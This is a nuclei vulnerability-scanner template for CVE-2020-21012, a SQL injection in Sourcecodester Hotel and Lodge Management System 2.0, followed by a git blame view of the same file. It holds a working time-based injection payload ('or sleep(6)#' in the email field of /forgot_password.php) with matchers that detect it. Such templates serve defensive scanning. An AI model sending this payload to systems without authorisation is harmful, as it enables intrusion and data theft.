nuclei-templates/http/cves/2020/CVE-2020-21012.yaml

id: CVE-2020-21012

info:
  name: Sourcecodester Hotel and Lodge Management System 2.0 - SQL Injection
  author: edoardottt
  severity: critical
  description: |
    Sourcecodester Hotel and Lodge Management System 2.0 contains a SQL injection vulnerability via the email parameter to the edit page for Customer, Room, Currency, Room Booking Details, or Tax Details. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
  remediation: |
    Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in the Sourcecodester Hotel and Lodge Management System 2.0.
  reference:
    - https://github.com/hitIer/web_test/tree/master/hotel
    - https://www.sourcecodester.com/php/13707/hotel-and-lodge-management-system.html
    - https://nvd.nist.gov/vuln/detail/CVE-2020-21012
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-21012
    cwe-id: CWE-89
    epss-score: 0.0341
    epss-percentile: 0.90358
    cpe: cpe:2.3:a:hotel_and_lodge_booking_management_system_project:hotel_and_lodge_booking_management_system:2.0:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: hotel_and_lodge_booking_management_system_project
    product: hotel_and_lodge_booking_management_system
  tags: cve,cve2020,hotel,sqli,unauth

http:
  - raw:
      - |
        POST /forgot_password.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        btn_forgot=1&email=1%27%20or%20sleep(6)%23

    matchers:
      - type: dsl
        dsl:
          - 'duration>=6'
          - 'status_code == 200'
          - 'contains(body, "Hotel Booking System")'
        condition: and

# digest: 4b0a00483046022100870e516adf2b67efe478074139fe32d41653da5da4d370739d5892c5b554a7a70221008b483d906dac66f3de2130c036f3188ce8fd568e3d748aaa94791edf48e9238c:922c64590222798bb761d5b6d8e72950
Add CVE-2020-21012 2022-09-30 14:26:08 +00:00			`id: CVE-2020-21012`

			`info:`
			`name: Sourcecodester Hotel and Lodge Management System 2.0 - SQL Injection`
			`author: edoardottt`
			`severity: critical`
			`description: \|`
Dashboard Content Enhancements (#6308) Dashboard Content Enhancements 2022-12-09 21:40:18 +00:00			`Sourcecodester Hotel and Lodge Management System 2.0 contains a SQL injection vulnerability via the email parameter to the edit page for Customer, Room, Currency, Room Booking Details, or Tax Details. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.`
updated 2020 CVEs 2023-09-06 12:22:36 +00:00			`remediation: \|`
			`Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in the Sourcecodester Hotel and Lodge Management System 2.0.`
Add CVE-2020-21012 2022-09-30 14:26:08 +00:00			`reference:`
			`- https://github.com/hitIer/web_test/tree/master/hotel`
Update CVE-2020-21012.yaml 2022-11-15 11:15:00 +00:00			`- https://www.sourcecodester.com/php/13707/hotel-and-lodge-management-system.html`
Add CVE-2020-21012 2022-09-30 14:26:08 +00:00			`- https://nvd.nist.gov/vuln/detail/CVE-2020-21012`
			`classification:`
Auto Generated CVE annotations [Wed Nov 16 09:38:10 UTC 2022] :robot: 2022-11-16 09:38:10 +00:00			`cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H`
			`cvss-score: 9.8`
Add CVE-2020-21012 2022-09-30 14:26:08 +00:00			`cve-id: CVE-2020-21012`
Auto Generated CVE annotations [Wed Nov 16 09:38:10 UTC 2022] :robot: 2022-11-16 09:38:10 +00:00			`cwe-id: CWE-89`
TemplateMan Update [Sun Oct 29 11:57:58 UTC 2023] :robot: 2023-10-29 11:57:59 +00:00			`epss-score: 0.0341`
TemplateMan Update [Mon Oct 30 20:55:37 UTC 2023] :robot: 2023-10-30 20:55:37 +00:00			`epss-percentile: 0.90358`
updated 2020 CVEs 2023-09-06 12:22:36 +00:00			`cpe: cpe:2.3:a:hotel_and_lodge_booking_management_system_project:hotel_and_lodge_booking_management_system:2.0:::::::*`
Update CVE-2020-21012.yaml 2022-11-15 11:15:00 +00:00			`metadata:`
boolean format update 2023-06-04 08:13:42 +00:00			`verified: true`
updated 2020 CVEs 2023-09-06 12:22:36 +00:00			`max-request: 1`
CVE Enrichment :tada: 2023-07-11 19:49:27 +00:00			`vendor: hotel_and_lodge_booking_management_system_project`
			`product: hotel_and_lodge_booking_management_system`
Update CVE-2020-21012.yaml 2022-11-16 08:36:26 +00:00			`tags: cve,cve2020,hotel,sqli,unauth`
Add CVE-2020-21012 2022-09-30 14:26:08 +00:00
Refactoring the directory structure based on protocols (#7137) * moving http templates * updated cves.json * moved network CVEs * updated scripts * updated workflows * updated requests to http * replaced network to tcp --------- Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com> 2023-04-27 04:28:59 +00:00			`http:`
Add CVE-2020-21012 2022-09-30 14:26:08 +00:00			`- raw:`
			`- \|`
			`POST /forgot_password.php HTTP/1.1`
			`Host: {{Hostname}}`
			`Content-Type: application/x-www-form-urlencoded`

Update CVE-2020-21012.yaml 2022-11-15 11:15:00 +00:00			`btn_forgot=1&email=1%27%20or%20sleep(6)%23`
Add CVE-2020-21012 2022-09-30 14:26:08 +00:00
			`matchers:`
			`- type: dsl`
			`dsl:`
Update CVE-2020-21012.yaml 2022-11-15 11:15:00 +00:00			`- 'duration>=6'`
			`- 'status_code == 200'`
			`- 'contains(body, "Hotel Booking System")'`
			`condition: and`
TemplateMan Update [Tue Oct 31 10:54:20 UTC 2023] :robot: 2023-10-31 10:54:20 +00:00
			`# digest: 4b0a00483046022100870e516adf2b67efe478074139fe32d41653da5da4d370739d5892c5b554a7a70221008b483d906dac66f3de2130c036f3188ce8fd568e3d748aaa94791edf48e9238c:922c64590222798bb761d5b6d8e72950`